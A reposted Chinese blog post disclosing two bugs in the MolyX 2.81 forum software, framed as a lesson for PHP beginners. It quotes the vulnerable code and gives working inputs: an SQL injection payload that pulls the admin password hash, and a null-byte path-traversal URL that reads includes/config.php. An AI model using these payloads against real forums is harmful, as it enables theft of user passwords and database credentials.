【转载】Molyx 2.81多个bug

by:xhm1n9

    MolyX以前还是有蛮大的用户下载量的，现在没落了，记得刚开始学php时有看过这程序，但是没能找到bug，今天偶然路过用这程序的论坛，非常想知道安全性相比以前有什么样的进步! 可惜到现在还是不咋地~~~漏洞比较简单，写出来算是给刚开始摸索php漏洞的同鞋举个例吧!

1, includes/db/db_base.php 注入

function insert($table, $array, $type = 'INSERT', $func = 'query_unbuffered')
    {
        if (($sql = $this->sql_insert($table, $array, $type)))
        {
            return $this->$func($sql);
        }
        return false;
    }
接着看sql_insert()函数
function sql_insert($table, $array, $type = 'INSERT', $prefix = 'INSERT')
    {
        if (!is_array($array) || empty($array))
        {
            return false;
        }
        return "$prefix INTO $table " . $this->sql_clause($type, $array);
    }
    再看sql_clause()函数
    function sql_clause($query, $array)
    {
        if (!is_array($array))
        {
            return false;
        }

        $query = strtoupper($query);
        $fields = $values = '';
        if ($query == 'INSERT' || $query == 'INSERT_SELECT')
        {
            foreach ($array as $key => $var)
            {
                $fields .= ', `' . $key . '`';

if (is_array($var) && is_string($var[0]))
                {
                    // INSERT SELECT
                    $values .= ', ' . $var[0];
                }
                else
                {
                    $values .= ', ' . $this->validate($var);
                }
            }
            $fields = substr($fields, 2);
            $values = substr($values, 2);
            $query = ($query == 'INSERT') ? ' (' . $fields . ') VALUES (' . $values . ')' : ' (' . $fields . ') SELECT ' . $values . ' ';
        }
    .......................................省略无关代码

      $values .= ', ' . $var[0]; 变量$var[0]两边并没有用到单引号，问题产生了!!

      但要注意global.php中的init_input()函数对全局变量做了array(' ', '', '>', '<', '"', '!', "'", "\n", '$', "\r")过滤成array(' ', '', '>', '<', '"', '!', ''', '', '$', '')

      利用方法：查找$DB->insert(),跟下它的第二个参数是否有我们能利用的变量，然后跟据流程构造提交.
      如：$aa[]=0,(select+password+from+mxb_user+where+id=1),0,0)%23


2,代码泄露漏洞

attachment.php

function showthumb()
    {
        global $DB, $forums, $_INPUT, $bbuserinfo, $bboptions;
        $forums->noheader = 1;
    ...............................
    else
        {
            $subpath = SAFE_MODE ? "" : implode('/', preg_split('//', intval($_INPUT['u']), -1, PREG_SPLIT_NO_EMPTY));
            $subpath = $_INPUT['attachpath'] ? $_INPUT['attachpath'] : $subpath;
            $path = $bboptions['uploadfolder'] . '/' . $subpath;
            $_INPUT['attach'] = str_replace("\\", "/", $_INPUT['attach']);
            $_INPUT['attach'] = str_replace("/", "", substr($_INPUT['attach'], strrpos($_INPUT['attach'], '/')));
            $showfile = $path . "/" . $_INPUT['attach'];
      .....................................
      if (file_exists($showfile) AND ($forums->cache['attachmenttype'][ $_INPUT['extension'] ]['mimetype'] != ""))
            {
                @header('Cache-control: max-age=31536000');
                @header('Expires: ' . gmdate("D, d M Y H:i:s", TIMENOW + 31536000) . ' GMT');
                @header('Content-Type: ' . $forums->cache['attachmenttype'][$_INPUT['extension']]['mimetype']);
                @header('Content-Disposition: inline; filename="' . urldecode($_INPUT['filename']) . '"');
                @header('Content-Transfer-Encoding: binary');
                @header('Content-Length: ' . (string) (filesize($showfile)));
                @readfile($showfile);
                exit();
            }
        ..........................................
    $_INPUT['attach']过滤得蛮严的，但$_INPUT['attachpath']没过滤，因为系统初始化时有用到stripslashes()所以我们可以用%00来截断后面的参数!

    利用：去论坛发贴带个附件，获取下载地址，改attachpath为任意文件
    www.xx.com/attachment.php?do=showthumb&id=21&u=6&extension=jpg&attach=8_1275811008_082.jpg&filename=test.jpg&attachpath=../../includes/config.php%00

文章目录